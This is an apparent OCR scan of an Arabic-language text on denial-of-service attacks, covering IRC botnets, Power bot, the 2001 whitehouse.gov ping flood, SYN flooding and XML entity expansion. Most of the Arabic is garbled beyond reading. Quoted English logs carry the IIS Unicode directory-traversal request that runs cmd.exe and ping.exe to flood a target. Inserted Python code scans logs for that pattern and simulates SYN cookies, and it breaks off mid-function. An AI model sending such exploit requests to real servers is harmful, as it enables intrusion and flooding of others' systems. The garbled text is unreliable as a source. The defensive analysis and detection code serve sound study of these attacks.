Jlai* ^ji JjI^JI jj^iJI (j* <L»IS sUSl c£-^-c- j^c. (jjSj <Gl (j* ^c. Jl Jc-) lSj^-VI 4_Jjjjall CjI j£1I ^j* l_aWI <J^b IgiUliSI 
jjSj jSj .^jUJI oajbl o£ ujUill t> VI ^1 j] (jS*j V tl^q.n^l no J^ . (JjISj J "^Ull " lO'OOO j *M 

^jjoij JJ (J j]| Igjal s-!>Uxll L>^J 6 IRC £UJ^ a *-ifla] I Jaj .A-Ui^VI ^aj| j^ll 4_IU J 1 folio <J jj^^JI L-lau all (j-a (jjUill li& 

jll CjIjjVI fla** .L_fllUj ji l^mgi <SjJJI J^b IRC ^ J) Jj^» jll ^ uj& J u^j gH"" Jl Jj^ jll IRC ^ 

# d!a JL^ajVI aJI (j* ftjliluiVLj el ulS Trinity ^ 

4ijUll IRC r*^l J] W^LP^ J UJ^ ^^1 (JJ^H ^^1j1_J (jj-^J^ U^^W^I ' IRC J^ <UjtSll CliVU^ajVI ( ; Lll > all <1loj jS 

IRC ^1 jll j tcp/6667 aj^UVI c> Vaj) <^L3 iiUJI ^l^ki^U blto j 4 (rogue IRC servers) 

tAjjujUa jjc. ialLc Jc TCP JJ^ L5^\ L — 1 j^l c^LP^ j 'Phatbot 5Jajuit jj Ailiiill J*^. j t^^kl aJI .(aj^UJI 

6jUSl! sUa J stepping stone J^' lS^ ^jiilUJl UK J j .^ jmi I j'^ I iaUJI Jo 3 jqjq^ IRC ^ j^i Jl^ajVU ^jij ^ill j 

.IRC f fr* CjVUaSt ^UJt Jiill g-i jj 



[Figure: IRC-based control. Attacker, stepping stone, IRC server, bots; legend: command/control traffic, DoS traffic]



(MALWARE UPDATE) ^I^hj^I 

4_ill C— U>laJ ^jjjLujVI J ^Jj^jjj 4j^aLk DDoS C5^W^ -f^' J^' ^U'^*^ UJt^^^J U^J^-VI f& qia^X^.A\ ^C^ 1 C?' 

4_il^o AJI J J*-sll tdlLall (jj^ O^J 6 ^-*J^ll cJ^-^l a ^jAxII J 4_^.ll<Jl ^x»lj^)ill t?> ^ AiJaj Jj 4_SjUui ^ j; 

^JJJ f J?^^ ^1 jSI ^» CLjVVI j-aai- JjVl 1 AjII - Ikluaj U£ CjIjj^jII *bV <JVl Ikl^b . JlaJl Ajt-iflaJ td^^aall 

Jo <J a^ll 1 ^ ^ iklmJ jll L_astjJall JalAJ 1 aJJ jSJ ^ J^-jl CjIj^I (J^asU ^jV ;4Jlxi Lajb Clbaulj AjIaxII j 6^J^. jl j£I 

CjI jjVl c> ^^1 .lJjS (.> jlS US <L Jail (jjoib (jl Ja-VI V ^I^aII .<j!^Uo Jo 6 JaJjuall <jSaj j^I ^1 Vt c> 

^j-d ^1 jSVI i^VI jIa^VI (Jj^Vn cJ^S j cJS cJj^J (jl ^J^S jl ^dl jVI cJUjj] (Jj Ja (jc CjljjAaall jflj 6^ j^. j-<Jl lIjIj jill j 

.L-lJjll ^a^U. JU 6 jAj^^II 

^jjaSiil , jLjall JaLuUll Alll Alll CljUll ^I^JjojI J JxilU jjJa JJ ^lA^lfoxJl ^(p££r-tO-p€€V) ^1 (>< ^;' i ' < ^Ij^JjojI S^jj 

Phatbot ^a,<uo I 4 ^-j jVI J j .4i!j3l ^ ^jjj^UII ^ J^Uill 1 ^ iS <j| Aill nil aJI n>n c JUlJI J^f^ J^ ^Sluppcr 
jj Cjs>3I (Jj J^jII ^1 jp. ^alji^U (jj>.Vl <jl iajjll 4"(VTA5r£') ^LjUjII" J jS jijjj jill nil CjVL^jI Jo 

nil nil CjlSfxi J ^!>Uo ^iSaii ^jj-^lfoAll ^jS^j 44JVI oja ^alj^ki^b .^jjil uj^ (Gnutella caching servers) 
oja DDoS i— ASjjuj JiLc (jl clA^ nil nil djVU^I ajs jjj-«j j^-SI Jo s Jajjuoll J^ jl ^\ jSVI ^ Sjjj^. dj| jIjj^I jjuiil 

a jjll <Jo jA U-d tiliSiill J L-Jxj^a) j IjJJ^J jllSI 

(UNWITTING AGENT SCENARIO) l«J>-a- j^l *3KjM jjj^ 

SjLjall ^cxil jjII ^jxi lIjjjjj DjjjjJalLj ( . illaJJ V J^lj i^jJall Jalij ^ JJ jJJ^S 6 jfo^.1 tiljjujj jll DDoS (j - ** Uajl i^IUa 

. jjj^II <Sj^. ^a j^a ji jj* LfoLcaJ jjjjjja^ll ^VjA J ^S^jIIj ^.lfo<ill ^x»jaaj (.(Exploit) J^loaVI ^lli (j>» Vjj (jSl j 4 jl^aJI Jo 

p^jl (J^.t.1>jiVI J>»ljVI (JUjjLj ^a jll ^UjUII 6JA J^jk (jx» 4_Jjl ^!>IS jll ;^a J^-ll L " ^ J J ' J ^jilXjJall ^ idiajVI ^j-d ^Ujla ^ULaJL ^ajL ^.l^ll 



.(Unwitting Agent) uP j Jc o^-Jt ti^ ^ j .Ping.exe $^^31 jJl J^^i J)

L— Lj ^ <j!>Lk ^ ^^UaVI (j^J VU^I J&\ li^aj .^Uaill Jc- Jxillj 4_iC jJoll ^IjJl Aiilil L *~ - gall ialaj - laJLuijj tSjLja ^IjJ 

( http://staff.washington.edu/dittrich/talks/first j^') u^lAP 
J <jLaLij ^ j tPing.exe lS^*-^ p ^Lual c ^* > ^ j 1 ^ Q * lW j*-^ ^ajUJ! ciiLa^J! <jl j^ J^

^j-o j tLdLaJ <C jJjuu* <Lo.lk e^^. f^>\ <j 4<jjjI£juV1 CjLaaJb ^Jaa ^ J laid l—jjou] \ g j CjI <<^ft ^j-o C5"^ 

L_astjJall (J^IxJjojI <j!^L^ I^qIa^LujI ^IjujJ Jill <La,lk]| 4 A j > <a£ a J^*-!l <J^ J^l CjL&aJo J .^.5^ J J^a^a (jl jlc £A 4x- jJjuu* Cjl Ala All jJ 
* jjoj (j* (jjJjj^aL* jll j -U^aaOJ ^ j£j L_a»_jJa3l li^J (Patches) Cj Laaau^all l , JjJ-aII f <j* f>->lg ^1 <jl*J jll j 

i Jlial! " remote port-scanning tools"**-* ifl^l ^lj^ ^jj^jj^Li j^l ^!^£j3l aj^j ^jl^j V 

J NIPC's find_ddos cjULJ! ^Uaj CjL^la JjjL jo l^Jc jjiuJI jSaj Vj 4 (Zombie Zapper jl RID

^Uall (J^J^ 3 .DDoS r* JJJ^ ^J^- ^^J^ J 6 JJJ^l ^J^- ^^J**' 1 ^ax*jl ^iistjJall 

.Nessus l!^ j? ^ ^4^^ t '** 1 u ^ JalSj j L 
4 jjU 4 www.whitehouse.gov ICMP Echo Request (ping) flood c> J^jJ* ^j^J 

*ajj jj6 ^> ^^l£ jll ^ Ping (i^j ^j^il Microsoft IIS ^ ( w > ^l t ^l^kiujl ^LujI ^j^SI 1i* .2001 
Windows 2000 lS^^-^I ^ uj^ ^ t^^xjll ^2 ^Sj ^5 ^3UJI ^L^Jl ^-1^ ^ ^Jaill ^ ^jU ajs! .cAjL 

ping j .www.whitehouse.gov ■! IP u^j^ ^^1^2 j 4 ^1^ ) ^ Jaxj Ping.exe u^j^j ^ j 6 NT j 

c^U jlxJ! o^xj ja jj ^UJI JajjJJ! yi UNISOG 
I^jj U»^jc .^j^aS jjc. jll ij ^aaill djjjjjj ^ ikiLujj CjIj jA\ (j\ .I^js CjULjajill ^jia*jj ^U^ll AJjUui a ikiLujj Power bot 

.CjUL bjaSl ^.aJ Jj£ jll ^iid c <!■» > ^ Jataj j!>lstlajVI ^1 j^l JLajjU ^ajL l_a jjoj bot f 



(ATTACK PHASE) fj^t 



J ^^.Ijjj Jj^Jl ^J^- J ^aall t^a j^^l m t>^S j\\ CjLaJl» ^j-d UJ^>^ (S A ^ J Jk ^ ^'^c CjLa^JI <^ L-J>laj 

J^gJl 6^*0 AjA^J ^JJ . jxluaxll J^^^ J J^ UJ^ V ^ jl ^ ^l^ttll ^jU J^gJl J ^^klouJl ftbVI ^ JJ Jc I^UucI b L_JUJ| 

Jc ^jC d La Ijj 4 J-dlalxJl J^-jl 4"^^ (*?^ ^ ^-^>^ L>^ 4til3i ^xij . CjliLjajil! \±1 A3 CjS jll ^xi cJ^HJ g ^ 

jLlklj Ajjjailll (JjVl J^ 1 ^ U^J .Cl^ULjaji]! - ga^j Jc <sca.l^)ll 4_jAsu3I ^A5j Jc djAUI l^J^l 'Shaft 4L_jIj^V1 (J-aau 

lJ^, jllj ,UDP j 4SYN TCP <ICMP ^UL^ Jl. tf c> ^1 *^ jii^ .Shaft si J t> J jVl it jiVl 
UNISOG E-mail Message

Date: Fri, 04 May 2001 14:26:29 -0700 

From: Computer Security Officer <security@stanford.edu> 

To: unisog@sans.org 

Subject: [unisog] DDoS against www.whitehouse.gov 

The attack exploited vulnerable IIS5 servers on Win2K and WinNT systems. 

Immediately prior to the attack, we see an incoming port 80 connection from IP address 202.102.14.137 
(CHINANET Jiangsu province network) to each of the systems that subsequently began pinging 
198.137.240.92. The argus log looks in part like this. 



Fri 05/04 05:18:21 tcp 202.102.14.137.41406 <-> 128.12.177.11.80 EST
Fri 05/04 05:18:21 tcp 202.102.14.137.41495 <-> 128.12.157.89.80 EST
Fri 05/04 05:18:22 Ficmp 128.12.157.89 -> 198.137.240.92 ECO
Fri 05/04 05:18:22 Ficmp 128.12.177.11 -> 198.137.240.92 ECO



Each of the systems reviewed so far had two ping processes running. One of the hosts had the following in 
its IIS log file. 

12:21:36 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200
12:29:29 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200

While I am surprised that such a simple exploit could work, it looks like it may be exactly what happened. 

The attack was targeted at less than 2% of the total residence network population so it was probably mapped 
out earlier. ZDNet has a story running that indicated that we were not the only one used in this way. 

We are issuing an alert to our dorm network users to update their systems with the relevant security patches. 
We've been working so hard at cleaning up the Linux boxes that we've tended to ignore the Windows boxes. 
Not any more. 

Stephen 

Excerpt from "Power Bot" Analysis 

The HTTP GET request exploiting the Web server vulnerability (as seen by the ngrep utility from 
http://www.packetfactory.net/Projects/Ngrep/) and the corresponding flood traffic generated by the request: 
T 2001/06/08 02:20:09.406262 10.0.90.35:2585 -> 192.168.64.225:80 [AP]

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+30000+10.2.88.84+"-n"+9999+"-w"+10..



4-uIa ls 2li^ 



I 2001/06/08 02:20:09.430676 192.168.64.225 -> 10.2.88.84 8:0 7303@0:1480


The exploit is contained in the embedded Unicode characters %c1%9c, which trick the server into
performing a directory traversal and executing a command shell /winnt/system32/cmd.exe. 
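As an added example (not part of the UNISOG message or the "Power Bot" analysis quoted above), the check below decodes a request path the way a lenient server does, flags overlong UTF-8 escapes such as %c1%9c, and reports traversal into system32 binaries. The log lines are constructed, modelled on the quoted IIS entries and the ngrep capture.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample IIS log lines (time, client IP, method, URI, status).
# Lines 1 and 3 are modelled on the ping.exe entries quoted in the UNISOG
# message, line 5 on the cmd.exe request captured in the Power Bot analysis.
SAMPLE_LOG = """\
12:21:36 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200
12:22:01 192.168.5.20 GET /default.htm 200
12:29:29 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200
12:30:10 192.168.5.21 GET /images/logo.gif 304
12:31:44 10.0.90.35 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+-t+-l+30000+10.2.88.84 200
"""

PCT_ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")
TRAVERSAL = re.compile(r"\.\.[\\/]")
SYSTEM_BIN = re.compile(r"system32[\\/](cmd|ping)\.exe", re.IGNORECASE)


@dataclass
class Finding:
    line: str
    reasons: list[str]


def percent_decode(path: str) -> bytes:
    """Turn %XX escapes into raw bytes; other characters pass through as Latin-1."""
    out = bytearray()
    i = 0
    while i < len(path):
        m = PCT_ESCAPE.match(path, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out.append(ord(path[i]) & 0xFF)
            i += 1
    return bytes(out)


def overlong_sequences(raw: bytes) -> list[tuple[bytes, str]]:
    """Find 2-byte UTF-8 sequences whose lead byte is C0 or C1.

    Those lead bytes can only encode code points below 0x80, which a strict
    decoder rejects; a lenient decoder maps them to ASCII, so C1 9C becomes
    a backslash and ..%c1%9c.. turns into ..\\.. after decoding.
    """
    found = []
    for i in range(len(raw) - 1):
        if raw[i] in (0xC0, 0xC1) and 0x80 <= raw[i + 1] <= 0xBF:
            code_point = ((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            found.append((raw[i:i + 2], chr(code_point)))
    return found


def analyze_request(path: str) -> list[str]:
    """Return the reasons a request path looks like a traversal exploit (empty if clean)."""
    reasons = []
    raw = percent_decode(path)
    for seq, ch in overlong_sequences(raw):
        reasons.append(f"overlong UTF-8 {seq.hex()} decodes to {ch!r}")
        raw = raw.replace(seq, ch.encode("latin-1"))
    normalized = raw.decode("latin-1")
    if TRAVERSAL.search(normalized):
        reasons.append("directory traversal after decoding")
    m = SYSTEM_BIN.search(normalized)
    if m:
        reasons.append(f"system32 binary requested: {m.group(1).lower()}.exe")
    return reasons


def scan_log(text: str) -> list[Finding]:
    """Run analyze_request over every log line and collect the suspicious ones."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        reasons = analyze_request(fields[3])
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```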



[Figure: attack phase. Many agents sending DoS traffic to the victim]
AjujjuJ! CAjl£i3! _4_i^jJa3l jjialo £yz L£J^ 6 C5-^-^ (J^-^ ^ La£ JJJ^ L>^ J^* ^jjH-'-m *M^J^ *j 6 ^>^ C5^J

s jJI »<» J^a ; jj^UI p j^J! 12:00 ^ 0:00 ^1 cAl^\ J 'ci 1 ^ Jui 18:00 ^ 12:00 

^ ^jjUxi ^a (^O^ J^V^ J^A? C5^' J^-^ Cy^\ ( ^ £0*^') ■ JJJ - *^ djbjlaui JJjlj 



DoS Attack Techniques



6jJj£ (J^ 3 fc^UA .<Jjuij j\ fiUjaiVl (jC fi^^^ <J^ <La^aJl I J£&J .^-^^ (J^J f* I ; UjujJ Uui (J^a tilUfc 



[Figure: traffic graph over Fri, Sat, Sun; y-axis 25 M to 30 M; legend: average bits in, average bits out]

botnet jW^ >>i l ^^>^ clA^ C5^j 6< -- i jj^y^ a£jjui ^joj! j (jUaj ^^Jc cjLa^JI JiL^ , >jq Vi 4 jffi ^^j^c 

.^j^JI SjS sjU jl (pay-for-hire DDoS service) lpj* ^1 

cj^iU 5 ijc V U CjU^JI .^inill Z46 sc^UnWrtt A^jj£iy\ lLL^1\ qa Z56 c^^l^l ^201 1 ^ ^ 
,LLuo (j-<i (j^j^ <^ ^'^^ j-ftiouJl ^j^ill^ APT > ^>i^Vl Jl jV .J j^ 3 ^ uj^s j 4 ^gll 4 qVi^ a ^ 
APT = Advanced Persistent Threat



[Figure: share of attacks by layer. Application 54%, Network 46%]




A alia ^ Q^Lt^L ^ j^JI jjl j* ^ jj <J^1 i j» > ^ iaaa ^.Ij a*j iklujl j DDoSj DoS i— j-a <illk-<Jl ^1 jjVI t %A^aJ 

^Qj^ gaJ j^-aJ 4_x»,laJl j>» jLaj^Jl CjI j>» <ill^<J| ^| jjVI 4<Lalc ^ L^aJ /o^Astld CjUfl Jj ^ <j| Jj J;!^ ^ jllj 

"Flooding attack" cjULjajilt CjU^a j ("Semantic attack" aJV^II cjU^JI Ijajj c^^j) "vulnerability attacks" * 

.("brute-force attacks" i^Ull Sjill CjU^a Liajj ^^jj) 
^ <Jalj "vulnerability attacks" ( «» > ^ t CjU^a -i 



<JJij AJLujjl (JJJ^a jC- L_fl^Jl ,Jjl j-g j-a J til^^l^Jjuil Jj t fl^jj ;L_fl^Jl ^UaAl J djLl^ ^j;^ J cJ^- J' 6<jojLluJ| 

S 6A£jjoJI ^.jI j^. .cJ-**^ jjc. l(gU^ j ^c^l jAl jl S j^_a.VI (JlaxJ Jl J^t J 'M-^ l— IxjJa j jll CjI ASal) j* 

^ j^js 6 JUlJI Jjajuj Jc j^JI pUji l^ulaaJ j£*j Jll j ajjxj^ lJI^VI ji&l c^ill j DNS look up ^ 'jfi jljil 

^ JLuj jj (JJjia jC- JJ jJJ^l l J^*-^ Sjlcl jl Jj aLua llll ^Jajl (J^axJ JjjaxlH L-UjujJ ^ifr* 'Ping-Oj -Death (POD) 

[CERT/CC 1996a] ^OJ^ .^^j sf>* ICMP 
j* jjjc jJall (j-i ^Vim^ l jc jU j^> Jl l-s^j ^ j^l j* t" Flooding attack" > ^j^ l ciL^a -2 

j^Jfc 6<JHAl <J-1Jjuj Jc ,L_fl^i3 ^^joiJJjll ,Jjj-all ^UlLail jL^J j j^JJ ^AkJl Cjl Ala ^j-d (JjI^SI jLja^JjojU 

^jjoul L_LijJa>JI l-aaa c _ 5 ic jjujc iaLLd UDP ^jIjjuj (j-<i -^^^ cJ^jl^ $ ^ 'UDP Flooding 

.[CERT/CC 1996c] clk]^ .u^>Vl u^ii^JI Jja ^ J^jll JjIS Ui^l Jx^j jai jlLill ^ 



6 (OSI J - ^^ Clala±la llillj ^ajL c^ill JJJ^ jW^ 1 ) ^^^^ UJ^ ^A^Jl ( ; ^ jzJti Ai^JjaixJ! 4_i^jJa3l 

J gij* J tAji^i 4 r uA\ i J^lilU <lui3! jl "links" ^j^-^j11 '"ongoing communication" s j^l^ l cjVI^jVI t jjj! jll 
jl Ji^V . Jj xj^a ll ^Ikj jl (j^flaj 4i^jjoiJI A-puJall jjfL jl t^Uajlt ajI^j J .[Handley et ah 2006] ^ Jc- j^*^ 

.TCP/IP J J^JJ^ CjlLJa iiij ^ill jj jjj.a£3l 

DoS on application ^ 

ikU t_JJ Jl Cjl ^'qU tJllxJl cJ^f^ Jc- .(JJJ^^I l^A l^Jt-Q J^lxJJ jl j^-ftJ jll j <-dAaJl Cjl Ala jxi > A^Jl Jj cJ ^3^" cS^jj 

J ^5 jj^kll CjUIUI j>» ^j^^xJl ^AslSI j>» (j^axj A j^-j tilUA j jfLj i " JU3Uj ;4_j^Isl!I Jl dal Ala CjS jll jxi 4 m ^ 
£>Ijj ^ill ^^IxJl <J-a^Jl J jij Lc,J tJ^Jl <J^J ^jSj J ^ " o clA^ piLaaJi diUlla 1^000 f ^" * J ^ 64£jJal3 AjjoljjjII

.(cjIj^II j^) <±i\^\ J c-AL 100 Li*j^ 

La liA Jj 10 l£ ( rC* l£ JfH A ^ «j '*^ l>> lO'OOO J (^W*^ (*^^ J ^ U^J 

cjUUaH p jVl .^UJt Sj^ <> Xl 10 J gfr" J] ^Ljaj j t^ijLill J cjUUaH bOOO 

Exponential Entity Expansion Attack C5-^J extensible Markup Language (XML) parser DoS J ' 
^ Jc ^ jllj XML ^Ljj XML Jj '(Billion Laughs attack LjaJ 4ijj*Jlj) 

til^lojl Jl ^^lij -uli cXML J.:^' ; o JjL^j La^jc .[2009 lM^ j^] ^ 1 °^ J) 'g£* 1 a j ^ 

ajLlkl ^aJJ ^aJ lij ;<iI3i £-aj .4_La£L (JjajuliII ^aUaj Jc DOS Qj- ^ L>^ (L^jLoijj J^A 3 -^ (j^-aJ ^^jll 4_Lal jlall CjVL^jVI 

J> <aJ ^3 '(^]^ (_5 > JJJ*^ Jl cdiULlJ S^C-IS ^^lA 6L_13j3l 6(JliLall ^J-iJjuo (^^ic) JJ 1 ^ ^5^* ^ J 1 ^^^ 6 ^ (JjjLojI ^^ic Ajl^-J 

^jJa ^li^ll ^ S^oLoi-a]| ftj^lS ^-boaJ Cjlc^laJl ^ Jj^xJI jaJl J-a <1jU 4_La£ bj jl <ia£L ( LjjJa^ll JAj V (J^f!aj3l ^ j^A 

DoS on Operating system *k 

C-iLa^A ^IflaJ ciilli ^aj .CjlLulalS) ^^Ic A^a.^lt L-JLa^a CjI »a^J A^jLaba (JjxjooII ^Unj ^^Ic ^La^k]l L. CjLaaA 

(TCP) SYN flooding j& ^ ^ jj*-^^ ^La^JI tj->^ ^ . JJLuiill ^Uaj <-a^kll djLa^A 

s j£lMJ ^^aj .TCP ^il^a JLa^l ^all TCP SYN f>^> c> ^ lUj^ ^W^l J ^ '[CERT/CC 1996b] 

.^_J JL^j!)U TCP (J^ ^ Jjt *;\\\ ^Ltj ^ Cjllnkill ^.La^ jLj! <J ^J^JI liA Jla .^JauJall JL^sjI 

(Exploiting a Vulnerability) <-kJa!t iliS J5lii«il J_ 

tLa j-aC .^J^ > ^ J;iC. cJ^*^ ^3^^^ ^3^^ t° (-W - *^ '(J'^l^ ^Wjj^ (J^^J 'NT J Windows lS^*-'-' 1 ^ ^aUaj ^ Jlk lilljA 6<JllaJl
ol^^a 4^a^lc ^-^J ^ La (J£3j t^stj^aVI U -0 (^^^ J^) C5^^ ^ <aj > ^JJ ^-jli t4 Q A^jjJa] 1^. o^u^ 4^a^^Jl (jj^J LaAjc 

jaJt ^laS ; c# itlJI ^ . C ^L^VL ^^Ixjj ^ jaJI ^ jL\ j Jjl jj ^ Ji5 .(fragmented) 

^j£-aJ L_axjJa3l I^A , jj jJJ-a£3l (JjxjujJ o^lcj jl t^JaaJ j t^jjUl ^1 J-aVl t^j^ > JJC. i^uLi a\ j^all ^3^^ '^ c ' 1 >1 ^ 

6jsu ^jojL <i jjsui oiA .(xp jj^J ^ ^ Sjaull oi^) A-i^jJall UDP ^3^- L>^ cJLujj] <!!>lijjaj| 

.newtearj 'teardrop 'boink 'bonk 

^ ^ ? t> o±&\ j J^^^ t^* 2 o-^^ J^A? Vulnerability attacks 

(ATTACKING A PROTOCOL) JjSjSxtfM * 

CjLa^J ^LalxJl ^a^Lall (jin ^1 ^ l^A jjmq'n ^ jSj jjoj V jl .TCP SYN flood J JJ^^ djLa^Jb ^j-a ^Lla JUa 

.dlLa^JI L> «J t^Lkll TCP SYN lS^*JI lUj^ .^Lkllj JjyixJl ^jjj 4mKll dlLak^ ^ j^ajUill TCP ^ 

l^l^ki^l ^jja JL^ijI ^{initial sequence number) JjVl lW^I ^ <j > ^^ t ^ ^SYN f J 

JtS Ik. .(ojj^laJl CjULJI j\ t^jj^ j^LaJl ^-a J-alsdl j L^jxjII <i£-aJ ^^LiJl ^jl Clll^) ^LaJl Jj l^JLuijj ^aJJ jit CjULJI Jc jila^il 

.JjyixJI Jj^ CjUjkJI ojJ^j '(TCB) "transmission control block" JL^jVI J ^UJI u ^^^J 'SYN ^ 3^ 

^JjuaLaLill ^aflj CjLa jIslxJI jLajjIj cJ^-^^ (JjoiLouH ^aSjJ lijlx-a t^jLa^k t . ilia ^J-a ^alluJ ^Ia*^^ ^-^jj 'SYN-ACK ^ ^ 

c5i3! ^LkJI Jj ACK ^ JL eJ L Jjy^J! . JL^jV! ^ ^SYN-ACK <-a> ^ 6L ^ 1 -f^ <Jj^ 
[Figure: TCP handshake between client and server. Client sends SYN; server allocates TCB; client allocates TCB]
jjij AAk < SYN- ACK *J TCB j^ 1 L*^c . jfL* cjSj ^ ^UJI ^jl ja j^j. ^ ^ii^vi 

^ <J!)tk ^j^k-<J! 4_^.Lai^ ^jc ^tj^Vlj ^(JIj^jVI Jplc-L ^LkJI ^jIj ^1^1 (RST 4-^3^ J^j) i3$J^ o^) 

ftjStil! iilLaij <c jjaij CjUiyi £>i& .lAj^J! j>i^q IP ^l^klajU 3^ jSLg ( L^aj ^ ^jAxJI Jjj ^l^xJI <TCP SYN L - ^ ^ 1 



j^ii c^l jSl SjIc ("n.Vit TCP ^VU^il .t*Ui <> JS! jll JU^jV! CjUIL ^ aj! Jjii V ^UJIj 4^iU] TCB 

(j-d . .^aVrtt <Lla JJC. <iI3i L_fl!^-k ^J^J ^aJJ jl ;<Jj£li ^| J^J '^-^-^ ? ^ (Jla*J tSj^U CjVI^. ^ .C£^>^ ^- c 'JJ J ^ ui ^VIj^jU (J^iLaaJ 
&J-a) > ^all oL^J SYN ^3^ L>* J-ftlaui jUj jJ ^*>1 g a\\ j^^Jl S^all d£j^<Jl (j^^xJl 4aL.h<i ^^ic -lali^Jl <J^.I 

.(TCP djtjj^lt ^L^VI jl <V<i 4-ki.»l jj Ujjj^j ^3 ^1 jjt 
^il<u3! > uj I g l£ iqj Vj t<c j^jjuixJI SYN Cy* ^i^i ^ j-" ^ 1 ^ ^ j ^j^>*jj a ^ 

^Ixluj <Cjjjab<Jl ^^>^- L . V"V TCP SYN L - d ^ 1 ^ ^ cJ^^-*^^ clA^ a *^J^ o^ls ^ jJ V .Alm^Jlj jjoJI 

6 Jjir > ^ ^Ld^Jl jUj JjJ ^aJ ,4_l^jJa3l C5 ic ^ TCP \. vW *^ * ^ TCP SYN ( ** & ^ 1 f (j-d 

'TCP SYN ( - ^ ^ 1 ^ C5^>^^ a ^ ' .4_i^jJa3! ^jl j-<J (Jl*i -lajj 1 g i£ <Lj AijSJl ^3^^ L>^ *^J J ^ lC ' L>^ ^ 

iaUx cJj^j SYN TCP e> c> ^ ^ ^V 31 ■ JSl j 'random port TCP SYN flooding 



SYN cjULj^ ^ lUUI^ TCP SYN cookies ' ^ .iK^ll lUj j+ja1\ c^jZji jjJ3 ^1 ^l^la.VI <<L13 

t JL^jVI <JU J^j 'SYN ^ULjaja l^i^ajj ^ jlj-^t ^ Bind View ^ RAZOR c^j^ c> Nomad 

cjVU^jVI t> jjiSlI Jj^nn ^ <^ jLauJI ^l^JI C5^^ .JjjjSII TCB J J^jVI c j& 

<!l .TCP API L>^ <J^aji o ^3^" f ^ J 4_^d^)J daJ C5^^J J 3 ^ TCB Sj^li ~\ iklLuji (jj^ I^jujJjojIj ^aJ ^^jll 

C> ^ .TCB (_>aj^»i>J V JjSjII 

t Jliall Jjauj (^Ic .JjiiaiJl ^gi ^ujaJI (jl <jauJa]l ^sjjjj TCP <_>"'j j^*- 4 4j»jja3l j-o ^Tn.nj JjS jll .[header flags) 
ACK ^> J-j^ J ^ Ail OjSjII .540ACK ^jj 1232 SEQ ^jf SYN-ACK > ti-jl lij 
j^; i^kaJ ja^l >J (^«3I r ua-j .V ^W-lt 'TCBs ^1 u 1 c> .ACK 1233 j SEQ 540 f 
s ^ &1I <da j3! (jUaj ^ jIa. dVU^VI (J*?*.? V ^— ^ ; ^ ^ iali^il < . u^Lujj *u£1j ^LgL^. TCP dVU^il ^ixJch ^jL ^\ $ &1I

.stack SYN flooding protections J-^VI ^j^b ^ ^ J^u J\ jSaj <j| . JjjjSII ^jl^* jj^ Vj J^Jl 

JUi ^la^ ^TCP SYN cookies j 'Naptha attack fj^l ^ cs^j 

(j-a (S ^ clA^ O^-f^ ^ m a dV j£ jJ JJJ ^ (JjuaULall Jynl ill I ^a^c t V^lun ^^jII <J j£ jj jjJI dLaaJb ^j^tM 

j& (J j£ jJjJJ dl .LJa J-**^ jft ^^^L^VI tUi m A naLaJI iOjl j-g ( . ll^J 4il <JJ^ ^ ;^LJ| ^ ^jl j-a till^JjoaJj <Ja*H 

,^LJl ^1L^ ^ djlilill Qli (j jljJ l£^I <J J-^JJ^ 1 ^ 
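As an added example (not the text's or any real stack's implementation), this simulation shows the SYN-cookie idea described above: the server folds the connection 4-tuple, the client's ISN and a time counter into its own initial sequence number, allocates no TCB on a SYN, and commits memory only when the returning ACK carries cookie + 1. The secret, addresses and the 10,000-SYN flood are constructed.

```python
from __future__ import annotations

import hashlib
import hmac

# Constructed server secret; a real stack rotates it periodically.
SERVER_SECRET = b"constructed-syn-cookie-secret"
MASK32 = 0xFFFFFFFF


def syn_cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int,
               client_isn: int, minute: int) -> int:
    """Derive the server's 32-bit ISN from the 4-tuple, the client ISN and time.

    The top 8 bits carry a minute counter so the server can recompute the
    cookie later; the low 24 bits are a keyed MAC. Nothing about the
    half-open connection is stored server-side.
    """
    minute &= 0xFF
    msg = f"{src_ip}:{src_port}:{dst_ip}:{dst_port}:{client_isn}:{minute}".encode()
    mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return (minute << 24) | int.from_bytes(mac[:3], "big")


class CookieServer:
    """Listener that allocates a TCB only after a valid third-handshake ACK."""

    def __init__(self, ip: str, port: int, max_age_minutes: int = 2):
        self.ip, self.port = ip, port
        self.max_age = max_age_minutes
        self.tcbs: dict[tuple[str, int], dict] = {}

    def on_syn(self, src_ip: str, src_port: int, client_isn: int, now_minute: int) -> dict:
        """Answer a SYN with a SYN-ACK whose sequence number is the cookie; keep no state."""
        cookie = syn_cookie(src_ip, src_port, self.ip, self.port, client_isn, now_minute)
        return {"flags": "SYN-ACK", "seq": cookie, "ack": (client_isn + 1) & MASK32}

    def on_ack(self, src_ip: str, src_port: int, seq: int, ack: int, now_minute: int) -> bool:
        """Validate the ACK: seq - 1 is the client ISN, ack - 1 must equal our cookie."""
        client_isn = (seq - 1) & MASK32
        claimed = (ack - 1) & MASK32
        minted = claimed >> 24
        if ((now_minute - minted) & 0xFF) > self.max_age:
            return False  # cookie too old or never issued: drop silently
        expected = syn_cookie(src_ip, src_port, self.ip, self.port, client_isn, minted)
        if not hmac.compare_digest(expected.to_bytes(4, "big"), claimed.to_bytes(4, "big")):
            return False
        # Only now does the server commit memory to the connection.
        self.tcbs[(src_ip, src_port)] = {"state": "ESTABLISHED", "rcv_nxt": seq, "snd_nxt": ack}
        return True


def simulate() -> dict:
    """A spoofed SYN flood, one genuine handshake, one forged ACK and one stale ACK."""
    srv = CookieServer("192.168.64.225", 80)
    for i in range(10_000):  # spoofed sources never complete the handshake
        srv.on_syn(f"10.0.{(i >> 8) & 0xFF}.{i & 0xFF}", 40_000 + i % 1000, 1000 + i, now_minute=100)
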